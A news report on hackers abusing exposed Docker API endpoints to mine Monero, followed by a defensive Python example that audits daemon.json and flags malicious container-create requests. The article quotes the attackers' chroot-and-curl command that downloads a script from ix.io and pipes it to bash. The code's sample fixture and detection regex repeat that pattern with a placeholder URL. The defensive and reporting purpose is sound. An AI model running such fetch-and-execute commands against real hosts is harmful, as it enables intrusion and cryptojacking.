Cybersecurity firm Bad Packets LLC has found that a group of hackers is actively scanning the internet for Docker hosts with exposed application programming interface (API) endpoints and using them to mine the cryptocurrency Monero.
The hacker group is currently scanning more than 59,000 IP networks for exposed API endpoints.
Monero is a privacy coin, meaning it has enhanced features to protect the privacy of users carrying out transactions. The identities of senders and receivers, as well as the value of each transaction, are obscured before being recorded on the blockchain. This differs from Bitcoin, where everyone on the network can see every transaction and the public keys of the parties involved. Unfortunately, these enhanced privacy features also attract hackers, whose identities are shielded by the same properties of the network.
Troy Mursch, chief research officer and co-founder of Bad Packets, said,
“This isn’t your average script kiddie exploit attempt. There was a moderate level of effort put into this campaign.”
The hackers use the exposed API endpoint to start an Alpine Linux container, which runs the following command:
chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash'
The command downloads and runs a Bash script that installs the XMRig cryptocurrency miner to mine Monero.
The attack began two days ago, and the hackers have so far mined 14.82 Monero (XMR), worth about $740 at the time of writing.
The malware installed on hosts with exposed APIs also uninstalls known monitoring agents and kills several processes, removing tooling that could otherwise be used to detect and remove it.
It also targets the host's rConfig configuration files, encrypting them and sending them to the hackers' server.
Another cybersecurity firm, Sandfly Security, has found that the hackers install SSH keys on the infected hosts so that they can control the hosts remotely.
In March this year, a runC vulnerability was used to install Monero mining software on exposed Docker hosts.
Last month a worm called "Graboid" affected more than 2,000 exposed Docker hosts.
Bad Packets' Mursch has asked Docker users to check whether their API endpoints are reachable from the internet and, if they are, to close them immediately.
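Two checks a defender can run in response to the findings above, written as an added example rather than code from the article or from Bad Packets: one audits a daemon.json for a Docker API listening on a non-loopback TCP address without TLS verification, the other inspects a container-create request body for the pattern the campaign used (host root bind-mounted into the container, a chroot into that mount, and a downloaded script piped to a shell). The sample daemon.json and create request are constructed, the URL in them is a placeholder, and the function names are my own.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample inputs, not taken from the article or from any real host.
SAMPLE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
SAMPLE_CREATE_SPEC = json.dumps({
    "Image": "alpine",
    "Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
            "curl -sL4 http://example.invalid/x | bash"],  # placeholder URL
    "HostConfig": {"Binds": ["/:/mnt"]},
})
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def unauthenticated_tcp_listeners(daemon_json_text):
    """Return 'host:port' for each tcp:// listener in daemon.json bound to a
    non-loopback address while tlsverify is off (2375 is the plain-text default)."""
    cfg = json.loads(daemon_json_text)
    if cfg.get("tlsverify"):
        return []
    found = []
    for entry in cfg.get("hosts") or []:
        url = urlparse(entry)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// sockets are not network-reachable
        host = url.hostname or "0.0.0.0"  # "tcp://:2375" means all interfaces
        if host not in ("127.0.0.1", "localhost", "::1"):
            found.append(f"{host}:{url.port or 2375}")
    return found


def host_breakout_indicators(create_spec_text):
    """List the traits of the campaign's container-create request that are
    present in the given request body (empty list means none were seen)."""
    spec = json.loads(create_spec_text)
    binds = (spec.get("HostConfig") or {}).get("Binds") or []
    cmd = " ".join(spec.get("Cmd") or [])
    reasons = []
    root_targets = [b.split(":")[1] for b in binds if b.startswith("/:")]
    if root_targets:
        reasons.append("host root bind-mounted")
    if any(f"chroot {target}" in cmd for target in root_targets):
        reasons.append("chroot into host root")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("remote script piped to shell")
    return reasons
```

The first function takes the text of /etc/docker/daemon.json; the second takes the JSON body of a POST to the daemon's container-create endpoint, which is what a reverse proxy or audit hook in front of the API would see.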